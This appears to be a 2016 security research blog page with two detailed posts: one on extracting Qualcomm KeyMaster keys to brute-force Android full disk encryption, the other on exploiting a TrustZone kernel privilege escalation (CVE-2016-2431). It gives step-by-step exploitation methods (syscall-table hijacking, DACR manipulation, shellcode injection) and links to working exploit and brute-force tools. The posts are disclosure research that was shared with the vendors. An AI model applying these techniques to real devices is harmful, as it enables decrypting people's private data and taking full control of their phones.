Bits, Please!

Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption

2016-06-30T15:00:00.001+03:00

After covering a TrustZone kernel vulnerability and exploit in the previous blog post, I thought this time it might be interesting to explore some of the implications of code-execution within the TrustZone kernel. In this blog post, I'll demonstrate how TrustZone kernel code-execution can be used to effectively break Android's Full Disk Encryption (FDE) scheme. We'll also see some of the inherent issues stemming from the design of Android's FDE scheme, even without any TrustZone vulnerability.

I've been in contact with Qualcomm regarding the issue prior to the release of this post, and have let them review the blog post. As always, they've been very helpful and fast to respond. Unfortunately, it seems as though fixing the issue is not simple, and might require hardware changes.

If you aren't interested in the technical details and just want to read the conclusions - feel free to jump right to the "Conclusions" section. In the same vein, if you're only interested in the code, jump directly to the "Code" section.

[UPDATE: I've made a factual mistake in the original blog post, and have corrected it in the post below. Apparently Qualcomm are not able to sign firmware images, only OEMs can do so. As such, they cannot be coerced to create a custom TrustZone image. I apologise for the mistake.]

And now without further ado, let's get to it!

Setting the Stage

A couple of months ago the highly-publicised case of Apple vs. FBI brought attention to the topic of privacy - especially in the context of mobile devices. Following the 2015 San Bernardino terrorist attack, the FBI seized a mobile phone belonging to the shooter, Syed Farook, with the intent to search it for any additional evidence or leads related to the ongoing investigation. However, despite being in possession of the device, the FBI were unable to unlock the phone and access its contents.

This may sound puzzling at first. "Surely if the FBI has access to the phone, could they not extract the user data stored on it using forensic tools?". Well, the answer is not that simple. You see, the device in question was an iPhone 5c, running iOS 9.

As you may well know, starting with iOS 8, Apple has automatically enabled Full Disk Encryption (FDE) using an encryption key which is derived from the user's password. In order to access the data on the device, the FBI would have to crack that encryption. Barring any errors in cryptographic design, this would most probably be achieved by cracking the user's password.

"So why not just brute-force the password?". That sounds like a completely valid approach - especially since most users are notoriously bad at choosing strong passwords, even more so when it comes to mobile devices.

However, the engineers at Apple were not oblivious to this concern when designing their FDE scheme. In order to try and mitigate this kind of attack, they've designed the encryption scheme so that the generated encryption key is bound to the hardware of the device.

In short, each device has an immutable 256-bit unique key called the UID, which is randomly generated and fused into the device's hardware at the factory. The key is stored in a way which completely prevents access to it using software or firmware (it can only be set as a key for the AES Engine), meaning that even Apple cannot extract it from the device once it's been set. This device-specific key is then used in combination with the provided user's password in order to generate the resulting encryption key used to protect the data on the device. This effectively 'tangles' the password and the UID key.

Apple's FDE KDF

Binding the encryption key to the device's hardware allows Apple to make the job much harder for would-be attackers. It essentially forces attackers to use the device for each cracking attempt. This, in turn, allows Apple to introduce a whole array of defences that would make cracking attempts on the device unattractive.

For starters, the key-derivation function shown above is engineered in such a way so that it would take a substantial amount of time to compute on the device. Specifically, Apple chose the function's parameters so that a single key derivation would take approximately 80 milliseconds. This delay would make cracking short alphanumeric passwords slow (~2 weeks for a 4-character alphanumeric password), and cracking longer passwords completely infeasible.

In order to further mitigate brute-force attacks on the device itself, Apple has also introduced an incrementally increasingly delay between subsequent password guesses. On the iPhone 5c, this delay was facilitated completely using software. Lastly, Apple has allowed for an option to completely erase all of the information stored on the device after 10 failed password attempts. This configuration, coupled with the software-induced delays, made cracking the password on the device itself rather infeasible as well.

With this in mind, it's a lot more reasonable that the FBI were unable to crack the device's encryption.

Had they been able to extract the UID key, they could have used as much (specialized) hardware as needed in order to rapidly guess many passwords, which would most probably allow them to eventually guess the correct password. However, seeing as the UID key cannot be extracted by means of software or firmware, that option is ruled out.

As for cracking the password on the device, the software-induced delays between password attempts and the possibility of obliterating all the data on the device made that option rather unattractive. That is, unless they could bypass the software protections... However, this is where the story gets rather irrelevant to this blog post, so we'll keep it at that.

If you'd like to read more, you can check out Dan Guido's superb post about the technical aspects of Apple v. FBI, or Matthew Green's great overview on Apple's FDE, or better yet, the iOS Security Guide.

Going back to the issue at hand - we can see that Apple has cleverly designed their FDE scheme in order to make it very difficult to crack. Android, being the mature operating system that it is, was not one to lag behind. In fact, Android has also offered full disk encryption, which has been enabled by default since Android 5.0.

So how does Android's FDE scheme fare? Let's find out.

Android Full Disk Encryption

Starting with Android 5.0, Android devices automatically protect all of the user's information by enabling full disk encryption.

Android FDE is based on a Linux Kernel subsystem called dm-crypt, which is widely deployed and researched. Off the bat, this is already good news - dm-crypt has withstood the test of time, and as such seems like a great candidate for an FDE implementation. However, while the encryption scheme may be robust, the system is only as strong as the key being used to encrypt the information. Additionally, mobile devices tend to cause users to choose poorer passwords in general. This means the key derivation function is hugely important in this setting.

So how is the encryption key generated?

This process is described in great detail in the official documentation of Android FDE, and in even greater detail in Nikolay Elenkov's blog, "Android Explorations". In short, the device generates a randomly-chosen 128-bit master key (which we'll refer to as the Device Encryption Key - DEK) and a 128-bit randomly-chosen salt. The DEK is then protected using an elaborate key derivation scheme, which uses the user's provided unlock credentials (PIN/Password/Pattern) in order to derive a key which will ultimately encrypt the DEK. The encrypted DEK is then stored on the device, inside a special unencrypted structure called the "crypto footer".

The encrypted disk can then be decrypted by simply taking the user's provided credentials, passing them through the key derivation function, and using the resulting key to decrypt the stored DEK. Once the DEK is decrypted, it can be used to decrypt user's information.

However, this is where it gets interesting! Just like Apple's FDE scheme, Android FDE seeks to prevent brute-force cracking attacks; both on the device and especially off of it.

Naturally, in order to prevent on-device cracking attacks, Android introduced delays between decryption attempts and an option to wipe the user's information after a few subsequent failed decryption attempts (just like iOS). But what about preventing off-device brute-force attacks? Well, this is achieved by introducing a step in the key derivation scheme which binds the key to the device's hardware. This binding is performed using Android's Hardware-Backed Keystore - KeyMaster.

KeyMaster

The KeyMaster module is intended to assure the protection of cryptographic keys generated by applications. In order to guarantee that this protection cannot be tampered with, the KeyMaster module runs in a Trusted Execution Environment (TEE), which is completely separate from the Android operating system. In keeping with the TrustZone terminology, we'll refer to the Android operating system as the "Non-Secure World", and to the TEE as the "Secure World".

Put simply, the KeyMaster module can be used to generate encryption keys, and to perform cryptographic operations on them, without ever revealing the keys to the Non-Secure World.

Once the keys are generated in the KeyMaster module, they are encrypted using a hardware-backed encryption key, and returned to Non-Secure World. Whenever the Non-Secure World wishes to perform an operation using the generated keys, it must supply the encrypted "key blob" to the KeyMaster module. The KeyMaster module can then decrypt the stored key, use it to perform the wanted cryptographic operation, and finally return the result to the Non-Secure World.

Since this is all done without ever revealing the cryptographic keys used to protect the key blobs to the Non-Secure World, this means that all cryptographic operations performed using key blobs must be handled by the KeyMaster module, directly on the device itself.

With this in mind, let's see exactly how KeyMaster is used in Android's FDE scheme. We'll do so by taking a closer look at the hardware-bound key derivation function used in Android's FDE scheme. Here's a short schematic detailing the KDF (based on a similar schematic created by Nikolay Elenkov):

Android FDE's KDF

As you can see, in order to bind the KDF to the hardware of the device, an additional field is stored in the crypto footer - a KeyMaster-generated key blob. This key blob contains a KeyMaster-encrypted RSA-2048 private key, which is used to sign the encryption key in an intermediate step in the KDF - thus requiring the use of the KeyMaster module in order to produce the intermediate key used decrypt the DEK in each decryption attempt.

Moreover, the crypto footer also contains an additional field that doesn't serve any direct purpose in the decryption process; the value returned from running scrypt on the final intermediate key (IK3). This value is referred to as the "scrypted_intermediate_key" (Scrypted IK in the diagram above). It is used to verify the validity of the supplied FDE password in case of errors during the decryption process. This is important since it allows Android to know when a given encryption key is valid but the disk itself is faulty. However, knowing this value still shouldn't help the attacker "reverse" it to retrieve the IK3, so it still can't be used to help attackers aiming to guess the password off the device.

As we've seen, the Android FDE's KDF is "bound" to the hardware of the device by the intermediate KeyMaster signature. But how secure is the KeyMaster module? How are the key blobs protected? Unfortunately, this is hard to say. The implementation of the KeyMaster module is provided by the SoC OEMs and, as such, is completely undocumented (essentially a black-box). We could try and rely on the official Android documentation, which states that the KeyMaster module: "...offers an opportunity for Android devices to provide hardware-backed, strong security services...". But surely that's not enough.

So... Are you pondering what I'm pondering?

Reversing Qualcomm's KeyMaster

As we've seen in the previous blog posts, Qualcomm provides a Trusted Execution Environment called QSEE (Qualcomm Secure Execution Environment). The QSEE environment allows small applications, called "Trustlets", to execute on a dedicated secured processor within the "Secure World" of TrustZone. One such QSEE trustlet running in the "Secure World" is the KeyMaster application. As we've already seen how to reverse-engineer QSEE trustlets, we can simply apply the same techniques in order to reverse engineer the KeyMaster module and gain some insight into its inner workings.

First, let's take a look at the Android source code which is used to interact with the KeyMaster application. Doing so reveals that the trustlet only supports four different commands:

As we're interested in the protections guarding the generated key blobs, let's take a look at the KEYMASTER_SIGN_DATA command. This command receives a previously encrypted key blob and somehow performs an operation using the encapsulated cryptographic key. Ergo, by reverse-engineering this function, we should be able to deduce how the encrypted key blobs are decapsulated by the KeyMaster module.

The command's signature is exactly as you'd imagine - the user provides an encrypted key blob, the signature parameters, and the address and length of the data to be signed. The trustlet then decapsulates the key, calculates the signature, and writes it into the shared result buffer.

As luck would have it, the key blob's structure is actually defined in the supplied header files. Here's what it looks like:

Okay! This is pretty interesting.

First, we can see that the key blob contains the unencrypted modulus and public exponent of the generated RSA key. However, the private exponent seems to be encrypted in some way. Not only that, but the whole key blob's authenticity is verified by using an HMAC. So where is the encryption key stored? Where is the HMAC key stored? We'll have to reverse-engineer the KeyMaster module to find out.

Let's take a look at the KeyMaster trustlet's implementation of the KEYMASTER_SIGN_DATA command. The function starts with some boilerplate validations in order to make sure the supplied parameters are valid. We'll skip those, since they aren't the focus of this post. After verifying all the parameters, the function maps-in the user-supplied data buffer, so that it will be accessible to the "Secure World". Eventually, we reach the "core" logic of the function:

Okay, we're definitely getting somewhere!

First of all, we can see that the code calls some function which I've taken the liberty of calling get_some_kind_of_buffer, and stores the results in the variables buffer_0 and buffer_1. Immediately after retrieving these buffers, the code calls the qsee_hmac function in order to calculate the HMAC of the first 0x624 bytes of the user-supplied key blob. This makes sense, since the size of the key blob structure we've seen before is exactly 0x624 bytes (without the HMAC field).

But wait! We've already seen the qsee_hmac function before - in the Widevine application. Specifically, we know it receives the following arguments:

The variable that we've called buffer_1 is passed in as the fourth argument to qsee_hmac. This can only mean one thing... It is in fact the HMAC key!

What about buffer_0? We can already see that it is used in the function do_something_with_keyblob. Not only that, but immediately after calling that function, the signature is calculated and written to the destination buffer. However, as we've previously seen, the private exponent is encrypted in the key blob. Obviously the RSA signature cannot be calculated until the private exponent is decrypted... So what does do_something_with_keyblob do? Let's see:

Aha! Just as we suspected. The function do_something_with_keyblob simply decrypts the private exponent, using buffer_0 as the encryption key!

Finally, let's take a look at the function that was used to retrieve the HMAC and encryption keys (now bearing a more appropriate name):

As we can see in the code above, the HMAC key and the encryption key are both generated using some kind of key derivation function. Each key is generated by invoking the KDF using a pair of hard-coded strings as inputs. The resulting derived key is then stored in the KeyMaster application's global buffer, and the pointer to the key is returned to the caller. Moreover, if we are to trust the provided strings, the internal key derivation function uses an actual hardware key, called the SHK, which would no doubt be hard to extract using software...

...But this is all irrelevant! The decapsulation code we have just reverse-engineered has revealed a very important fact.

Instead of creating a scheme which directly uses the hardware key without ever divulging it to software or firmware, the code above performs the encryption and validation of the key blobs using keys which are directly available to the TrustZone software! Note that the keys are also constant - they are directly derived from the SHK (which is fused into the hardware) and from two "hard-coded" strings.

Let's take a moment to explore some of the implications of this finding.

Conclusions

The key derivation is not hardware bound. Instead of using a real hardware key which cannot be extracted by software (for example, the SHK), the KeyMaster application uses a key derived from the SHK and directly available to TrustZone.
OEMs can comply with law enforcement to break Full Disk Encryption. Since the key is available to TrustZone, OEMs could simply create and sign a TrustZone image which extracts the KeyMaster keys and flash it to the target device. This would allow law enforcement to easily brute-force the FDE password off the device using the leaked keys.
Patching TrustZone vulnerabilities does not necessarily protect you from this issue. Even on patched devices, if an attacker can obtain the encrypted disk image (e.g. by using forensic tools), they can then "downgrade" the device to a vulnerable version, extract the key by exploiting TrustZone, and use them to brute-force the encryption. Since the key is derived directly from the SHK, and the SHK cannot be modified, this renders all down-gradable devices directly vulnerable.
Android FDE is only as strong as the TrustZone kernel or KeyMaster. Finding a TrustZone kernel vulnerability or a vulnerability in the KeyMaster trustlet, directly leads to the disclosure of the KeyMaster keys, thus enabling off-device attacks on Android FDE.

During my communication with Qualcomm I voiced concerns about the usage of a software-accessible key derived from the SHK. I suggested using the SHK (or another hardware key) directly. As far as I know, the SHK cannot be extracted from software, and is only available to the cryptographic processors (similarly to Apple's UID). Therefore, using it would thwart any attempt at off-device brute force attacks (barring the use of specialized hardware to extract the key).

However, reality is not that simple. The SHK is used for many different purposes. Allowing the user to directly encrypt data using the SHK would compromise those use-cases. Not only that, but the KeyMaster application is widely used in the Android operating-system. Modifying its behaviour could "break" applications which rely on it. Lastly, the current design of the KeyMaster application doesn't differentiate between requests which use the KeyMaster application for Android FDE and other requests for different use-cases. This makes it harder to incorporate a fix which only modifies the KeyMaster application.

Regardless, I believe this issue underscores the need for a solution that entangles the full disk encryption key with the device's hardware in a way which cannot be bypassed using software. Perhaps that means redesigning the FDE's KDF. Perhaps this can be addressed using additional hardware. I think this is something Google and OEMs should definitely get together and think about.

Extracting the KeyMaster Keys

Now that we've set our sights on the KeyMaster keys, we are still left with the challenge of extracting the keys directly from TrustZone.

Previously on the zero-to-TrustZone series of blog posts, we've discovered an exploit which allowed us to achieve code-execution within QSEE, namely, within the Widevine DRM application. However, is that enough?

Perhaps we could read the keys directly from the KeyMaster trustlet's memory from the context of the hijacked Widevine trustlet? Unfortunately, the answer is no. Any attempt to access a different QSEE application's memory causes an XPU violation, and subsequently crashes the violating trustlet (even when switching to a kernel context). What about calling the same KDF used by the KeyMaster module to generate the keys from the context of the Widevine trustlet? Unfortunately the answer is no once again. The KDF is only present in the KeyMaster application's code segment, and QSEE applications cannot modify their own code or allocate new executable pages.

Luckily, we've also previously discovered an additional privilege escalation from QSEE to the TrustZone kernel. Surely code execution within the TrustZone kernel would allow us to hijack any QSEE application! Then, once we control the KeyMaster application, we can simply use it to leak the HMAC and encryption keys and call it a day.

Recall that in the previous blog post we reverse-engineered the mechanism behind the invocation of system calls in the TrustZone kernel. Doing so revealed that most system-calls are invoked indirectly by using a set of globally-stored pointers, each of which pointing to a different table of supported system-calls. Each system-call table simply contained a bunch of consecutive 64-bit entries; a 32-bit value representing the syscall number, followed by a 32-bit pointer to the syscall handler function itself. Here is one such table:

Since these tables are used by all QSEE trustlets, they could serve as a highly convenient entry point in order to hijack the code execution within the KeyMaster application!

All we would need to do is to overwrite a system-call handler entry in the table, and point it to a function of our own. Then, once the KeyMaster application invokes the target system-call, it would execute our own handler instead of the original one! This also enables us not to worry about restoring execution after executing our code, which is a nice added bonus.

But there's a tiny snag - in order to direct the handler at a function of our own, we need some way to allocate a chunk of code which will be globally available in the "Secure World". This is because, as mentioned above, different QSEE applications cannot access each other's memory segments. This renders our previous method of overwriting the code segments of the Widevine application useless in this case. However, as we've seen in the past, the TrustZone Kernel's code segments (which are accessible to all QSEE application when executing in kernel context) are protected using a special hardware component called an XPU. Therefore, even when running within the TrustZone kernel and disabling access protection faults in the ARM MMU, we are still unable to modify them.

This is where some brute-force comes in handy... I've written a small snippet of code that quickly iterates over all of the TrustZone Kernel's code segments, and attempts to modify them. If there is any (mistakenly?) XPU-unprotected region, we will surely find it. Indeed, after iterating through the code segments, one rather large segment, ranging from addresses 0xFE806000 to 0xFE810000, appeared to be unprotected!

Since we don't want to disrupt the regular operation of the TrustZone kernel, it would be wise to find a small code-cave in that region, or a small chunk of code that would be harmless to overwrite. Searching around for a bit reveals a small bunch of logging strings in the segment - surely we can overwrite them without any adverse effects:

Now that we have a modifiable code cave in the TrustZone kernel, we can proceed to write a small stub that, when called, will exfiltrate the KeyMaster keys directly from the KeyMaster trustlet's memory!

Lastly, we need a simple way to cause the KeyMaster application to execute the hijacked system-call. Remember, we can easily send commands to the KeyMaster application which, in turn, will cause the KeyMaster application to call quite a few system-calls. Reviewing the KeyMaster's key-generation command reveals that one good candidate to hijack would be the "qsee_hmac" system-call:

KeyMaster's "Generate Key" Flow

Where qsee_hmac's signature is:

This is a good candidate for a few reasons:

The "data" argument that's passed in is a buffer that's shared with the non-secure world. This means whatever we write to it can easily retrieved after returning from the "Secure World".
The qsee_hmac function is not called very often, so hijacking it for a couple of seconds would probably be harmless.
The function receives the address of the HMAC key as one of the arguments. This saves us the need to find the KeyMaster application's address dynamically and calculate the addresses of the keys in memory.

Finally, all our shellcode would have to do is to read the HMAC and encryption keys from the KeyMaster application's global buffer (at the locations we saw earlier on), and "leak" them into the shared buffer. After returning from the command request, we could then simply fish-out the leaked keys from the shared buffer. Here's a small snippet of THUMB assembly that does just that:

Shellcode which leaks KeyMaster Keys

Putting it all together

Finally, we have all the pieces of the puzzle. All we need to do in order to extract the KeyMaster keys is to:

Enable the DACR in the TrustZone kernel to allow us to modify the code cave.
Write a small shellcode stub in the code cave which reads the keys from the KeyMaster application.
Hijack the "qsee_hmac" system-call and point it at our shellcode stub.
Call the KeyMaster's key-generation command, causing it to trigger the poisoned system-call and exfiltrate the keys into the shared buffer.
Read the leaked keys from the shared buffer.

Here's a diagram detailing all of these steps:

The Code

Finally, as always, I've provided the full source code for the attack described above. The code builds upon the two previously disclosed issues in the zero-to-TrustZone series, and allows you to leak the KeyMaster keys directly from your device! After successfully executing the exploit, the KeyMaster keys should be printed to the console, like so:

You can find the full source code of the exploit here:

https://github.com/laginimaineb/ExtractKeyMaster

I've also written a set of python scripts which can be used to brute-force Android full disk encryption off the device. You can find the scripts here:

https://github.com/laginimaineb/android_fde_bruteforce

Simply invoke the python script fde_bruteforce.py using:

The crypto footer from the device
The leaked KeyMaster keys
The word-list containing possible passwords

Currently, the script simply enumerates each password from a given word-list, and attempts to match the encryption result with the "scrypted intermediate key" stored in the crypto footer. That is, it passes each word in the word-list through the Android FDE KDF, scrypts the result, and compares it to the value stored in the crypto footer. Since the implementation is fully in python, it is rather slow... However, those seeking speed could port it to a much faster platform, such as hashcat/oclHashcat.

Here's what it looks like after running it on my own Nexus 6, encrypted using the password "secret":

Lastly, I've also written a script which can be used to decrypt already-generated KeyMaster key blobs. If you simply have a KeyMaster key blob that you'd like to decrypt using the leaked keys, you can do so by invoking the script km_keymaster.py, like so:

Final Thoughts

Full disk encryption is used world-wide, and can sometimes be instrumental to ensuring the privacy of people's most intimate pieces of information. As such, I believe the encryption scheme should be designed to be as "bullet-proof" as possible, against all types of adversaries. As we've seen, the current encryption scheme is far from bullet-proof, and can be hacked by an adversary or even broken by the OEMs themselves (if they are coerced to comply with law enforcement).

I hope that by shedding light on the subject, this research will motivate OEMs and Google to come together and think of a more robust solution for FDE. I realise that in the Android ecosystem this is harder to guarantee, due to the multitude of OEMs. However, I believe a concentrated effort on both sides can help the next generation of Android devices be truly "uncrackable".

TrustZone Kernel Privilege Escalation (CVE-2016-2431)

2016-06-15T14:27:00.000+03:00

In this blog post we'll continue our journey from zero permissions to code execution in the TrustZone kernel. Having previously elevated our privileges to QSEE, we are left with the task of exploiting the TrustZone kernel itself.

"Why?", I hear you ask.

Well... There are quite a few interesting things we can do solely from the context of the TrustZone kernel. To name a few:

We could hijack any QSEE application directly, thus exposing all of it's internal secrets. For example, we could directly extract the stored real-life fingerprint or various secret encryption keys (more on this in the next blog post!).
We could disable the hardware protections provided by the SoC's XPUs, allowing us to read and write directly to all of the DRAM. This includes the memory used by the peripherals on the board (such as the modem).
As we've previously seen, we could blow the QFuses responsible for various device features. In certain cases, this could allow us to unlock a locked bootloader (depending on how the lock is implemented).

So now that we've set the stage, let's start by surveying the attack surface!

Attack Surface

Qualcomm's Secure Environment Operating System (QSEOS), like most operating systems, provides services to the applications running under it by means of system-calls.

As you know, operating systems must take great care to protect themselves from malicious applications. In the case of system-calls, this means the operating system mustn't trust any information provided by an application and should always validate it. This forms a "trust-boundary" between the operating system itself and the running applications.

So... This sounds like a good place to start looking! Let's see if the TrustZone kernel does, in fact, cover all the bases.

In the "Secure World", just like the "Normal World", user-space applications can invoke system-calls by issuing the "SVC" instruction. All system-calls in QSEE are invoked via a single function, which I've dubbed "qsee_syscall":

As we can see, the function is a simple wrapper which does the following:

Stores the syscall number in R0
Stores the arguments for the syscall in R4-R9
Invokes the SVC instruction with the code 0x1400
Returns the syscall result via R0

So we know how syscalls are invoked, now let's look for the code in the TrustZone kernel which is used to handle SVC requests. Recall that when executing an SVC instruction in the "Secure World", similarly to the "Normal World", the "Secure World" must register the address of the vector to which the processor will jump when such an instruction is invoked.

Unlike SMC instructions (used to request "Secure World" services from the "Normal World"), which use the MVBAR (Monitor Vector Base Address Register) register to provide the vector's base address, SVC instructions simply use the "Secure" version of the VBAR (Vector Base Address Register).

Accessing the VBAR is done using the MRC/MCR opcodes, with the following operands:

So this means we can simply search for an MCR opcode with the following operands in the TrustZone kernel, and we should be able to find the address of secure copy of the VBAR. Indeed, searching for the opcode in the TrustZone image returns the following match:

According to the ARM documentation, the "Secure Vector" has the following structure:

At this point we can start tracing the execution from the SVC handler in the vector table.

The code initially does some boilerplate preparations, such as saving the passed arguments and context, and finally gets to the main entry point which is used to actually handle the requested system-call. Qualcomm have helpfully left a single logging string in this function containing it's original name "app_syscall_handler", so we'll use that name as well. Let's take a look at the function's high-level graph overview:

app_syscall_handler graph overview

...Okay... That's a lot of code.

However, on closer inspection, the graph seems very shallow, so while there are a lot of different code-paths, they are all relatively simple. In fact, the function is simply a large switch-case, which uses the syscall command-code supplied by the user (in R0) in order to select which syscall should be executed.

snippet from app_syscall_handler's switch-case

But something's obviously missing! Where are the validations on the arguments passed in by the user? app_syscall_handler does no such effort, so this means the validation can only possibly be in the syscalls themselves... Time to dig deeper once more!

As you can see in the screenshot above, most of the syscalls aren't directly invoked, but rather indirectly called by using a set of globally-stored pointers, each pointing to a different table of supported system-calls. I've taken to using the following (imaginative) names to describe them:

Cross-referencing these pointers reveals the locations of the actual system-call tables to which they point. The tables' structure is very simple - each entry contains a 32-bit number representing the syscall number within the table, followed by a pointer to the syscall handler function itself. Here is one such table:

As you can see, there is some logic behind the "grouping" of each set of syscalls. For example, the sixth table (above) contains only syscalls relating to memory management (although, admittedly, most tables are more loosely cobbled together).

Finally, let's take a look at a simple syscall which must perform validation in order to function correctly. A good candidate would be a syscall which receives a pointer as an argument, and subsequently writes data to that pointer. Obviously, this is incredibly dangerous, and would therefore require extra validation to make sure the pointer is strictly within the memory regions belonging to the QSEE application.

Digging through the widevine application, we find the following syscall:

This syscall receives four arguments:

A pointer to a "cipher" object, which has previously been initialized by calling "qsee_cipher_init"
The type of parameter which is going to be retrieved from the cipher object
The address to which the read parameter will be written
An unknown argument

Of course, QSEE applications always play nice and set the output pointer to a sensible address, but what's actually going on under the hood in the TrustZone kernel? Well, we now know enough to pop the literary hood and check out for ourselves. Going through app_syscall_handler's switch-case, we find the syscall table and offset of the kernel implementation of "qsee_cipher_get_param", leading us to the actual implementation of qsee_cipher_get_param:

This is our lucky day! Apparently the TrustZone kernel blindly trusts nearly all the parameters passed in by the user. Although the function does perform some sanity checks to make sure the given pointers are not NULL and the param_type is within the allowed range, it automatically trusts the user-supplied "output" argument. More importantly, we can see that if we use the parameter type 3, the function will write a single byte from our cipher to the supplied pointer!

Note that this was more than just a stroke of luck - taking a peek at the implementation of all the other syscalls reveals that the TrustZone kernel does not perform any validation on QSEE-supplied arguments (more specifically, it freely uses any given pointers), meaning that at the time all syscalls were vulnerable.

For the sake of our exploit, we'll stick to qsee_cipher_get_param, since we've already started reviewing it.

Full Read-Write

As always, before we start writing an exploit, let's try and improve our primitives. This is nearly always worth our while; the more time we spend on improving the primitives, the cleaner and more robust our exploit will be. We might even end up saving time in the long-run.

Right now we have an uncontrolled-write primitive - we can write some uncontrolled data from our cipher object to a controlled memory location. Of course, it would be much easier if we were able to control the written data as well.

Intuitively, since "qsee_cipher_get_param" is used to read a parameter from a cipher object, it stands to reason that there would be a matching function which is used to set the parameter. Indeed, searching for "qsee_cipher_set_param" in the widevine application confirms our suspicion:

Let's take a look at the implementation of this syscall:

Great!

It looks like we can set the parameter's value by using the same param_type value (3), and supplying a pointer to a controlled memory region within QSEE which will contain the byte we would later like to write. The TrustZone kernel will happily store the value we supplied in the cipher object, allowing us to later write that value to any address by calling qsee_cipher_get_param with our target pointer.

Putting this together, we now have relatively clean write-what-where primitive. Here's a run-down of our new primitive:

Initialize a cipher object using qsee_cipher_init
Allocate a buffer in QSEE
Write the wanted byte to our allocated QSEE buffer
Call qsee_cipher_set_param using our QSEE-allocated buffer as the param_value argument
Call qsee_cipher_get_param, but supply the target address as the output argument

You might have also noticed that we could use the inverse of this in order to get an arbitrary read primitive. All we would need to do is call qsee_cipher_set_param supplying the address we'd like to read as the param_value argument - this'll cause the TrustZone kernel to read the value at that address and store it in our cipher object. Then, we can simply retrieve that value by calling qsee_cipher_get_param.

Writing an Exploit

Using the primitives we just crafted, we finally have full read-write access to the TrustZone kernel. All that's left is to achieve code-execution within the TrustZone kernel in a controllable way.

The first obvious choice would be to write some shellcode into the TrustZone kernel's code segments and execute it. However, there's a tiny snag - the TrustZone kernel's code segments in newer devices are protected by special memory protection units (called XPUs), which prevent us for directly modifying the kernel's code (along with many different protected memory regions). We could still modify the kernel's code (more information in the next blog post!), but it would be much harder...

...However, we have already come across a piece of dynamically allocated code in the "Secure World" - the QSEE applications themselves!

So here's a plan - if we could ignore the access-protection bits on the code pages of the QSEE applications (since they are all marked as read-execute), we should be able to directly modify them from the context of the TrustZone kernel. Then, we could simply jump to the our newly-created code from the context of the kernel in order to execute any piece of code we'd like.

Luckily, ignoring the access-protection bits can actually be done without modifying the translation table at all, by using a convenient feature of the ARM MMU called "domains".

In the ARM translation table, each entry has a field which lists its permissions, as well as a 4-bit field denoting the "domain" to which the translation belongs.

Within the ARM MMU, there is a register called the DACR (Domain Access Control Register). This 32-bit register has 16 pairs of bits, one pair for each domain, which are used to specify whether faults for read access, write access, both, or neither, should be generated for translations of the given domain.

Whenever the processor attempts to access a given memory address, the MMU first checks if the access is possible using the access permissions of the given translation for that address. If the access is allowed, no fault is generated.

Otherwise, the MMU checks if the bits corresponding to the given domain in the DACR are set. If so, the fault is suppressed and the access is allowed.

This means that simply setting the DACR's value to 0xFFFFFFFF will cause the MMU to enable access to any mapped memory address, for both read and write access, without generating a fault (and more importantly, without having to modify the translation table).

Moreover, the TrustZone kernel already has a piece of code that is used to set the value of the DACR, which we can simply call using our own value (0xFFFFFFFF) in order to fully set the DACR.

TrustZone kernel function which sets the DACR

All that said and done, we're still missing a key component in our exploit! All we have right now is read/write access to the TrustZone kernel, we still need a way to execute arbitrary functions within the TrustZone kernel and restore execution. This would allow us to change the DACR using the gadget above and subsequently write and execute shellcode in the "Secure World".

Hijacking Syscalls

As we've seen, most QSEE system-calls are invoked indirectly by using a set of globally-stored pointers, each of which pointing to a corresponding system-call table.

While the system-call tables themselves are located in a memory region that is protected by an XPU, the pointers to these tables are not protected in any way! This is because they are only populated during runtime, and as such must reside in a modifiable memory region.

This little tidbit actually makes it much simpler for us to hijack code execution in the kernel in a controllable manner!

All we need to do is allocate our own "fake" system-call table. Our table would be identical to the real system-call table, apart from a single "poisoned" entry, which would point to a function of our choice (instead of pointing to the original syscall handler).

It should be noted that since we don't want to cause any adverse effects for other QSEE applications, it is important that we choose to modify an entry corresponding to an unused (or rarely used) system call.

Once we've crafted the "fake" syscall table, we can simply use our write primitive in order to modify the global syscall table pointer to point to our newly created "fake" table.

Then, whenever the "poisoned" system-call is invoked from QSEE, our function will be executed within the context of the TrustZone kernel! Not only that, but app_syscall_handler will also conveniently make sure the return value from our executed code will be returned to QSEE upon returning from the SVC call.

Putting it all together

By now we have all the pieces we need to write a simple exploit which writes a chunk of shellcode in the "Secure World", executes that shellcode in the context of the TrustZone kernel, and restores execution.

Here's what we need to do:

Allocate a "fake" syscall table in QSEE
Use the write primitive to overwrite the syscall table pointer to point to our crafted "fake" syscall table
Set the single "poison" syscall entry in the "fake" syscall table to point to the DACR-modifying function in the TrustZone kernel
Invoke the "poison" syscall in order to call the DACR-modifying function in the TrustZone kernel - thus setting the DACR to 0xFFFFFFFF
Use the write gadget to write our shellcode directly to a code page in QSEE belonging to our QSEE application
Invalidate the instruction cache (to avoid conflicts with the newly written code)
Set the single "poison" syscall entry in the "fake" syscall table to point to the written shellcode
Invoke the "poison" syscall in order to jump to our newly-written shellcode from the context of the TrustZone kernel!

Here's a small illustration detailing all of these steps:

Playing With The Code

As always, the full exploit source code is available here:

https://github.com/laginimaineb/cve-2016-2431

The exploit builds upon the previous QSEE exploit, in order to achieve QSEE code-execution. If you'd like to play around with it, you might want to use the following two useful functions:

tzbsp_execute_function - calls the given function with the given arguments within the context of the TrustZone kernel.

tzbsp_load_and_exec_file - Loads the shellcode from a given file and executes it within the context of the TrustZone kernel.

I've also included a small shell script called "build_shellcode.sh", which can be used to build the shellcode supplied in the file "shellcode.S" and write it into a binary blob (which can then be loaded and executed using the function above).

Have fun!

Timeline

13.10.2015 - Vulnerability disclosed and minimal PoC sent
15.10.2015 - Initial response from Google
16.10.2015 - Full exploit sent to Google
30.03.2016 - CVE assigned
02.05.2016 - Issue patched and released in the Nexus public bulletin

As far as I know, this vulnerability has been present in all devices and all versions of QSEOS, until it was finally patched in 02.05.2016. This means that effectively up to that point, obtaining code-execution within QSEE was equivalent to having code-execution within the TrustZone kernel (i.e., fully controlling nearly every aspect of the device).

As there was no public research into QSEE up to that point, this issue wasn't discovered. Hopefully in the future further research into QSEE and TrustZone in general will help uncover similar issues and make the security boundary between QSEOS and QSEE stronger.

War of the Worlds - Hijacking the Linux Kernel from QSEE

2016-05-05T22:11:00.001+03:00

After seeing a full QSEE vulnerability and exploit in the previous blog post, I thought it might be nice to see some QSEE shellcode in action.

As we've previously discussed, QSEE is extremely privileged - not only can it interact directly with the TrustZone kernel and access the hardware-secured TrustZone file-system (SFS), but it also has some direct form of access to the system's memory.

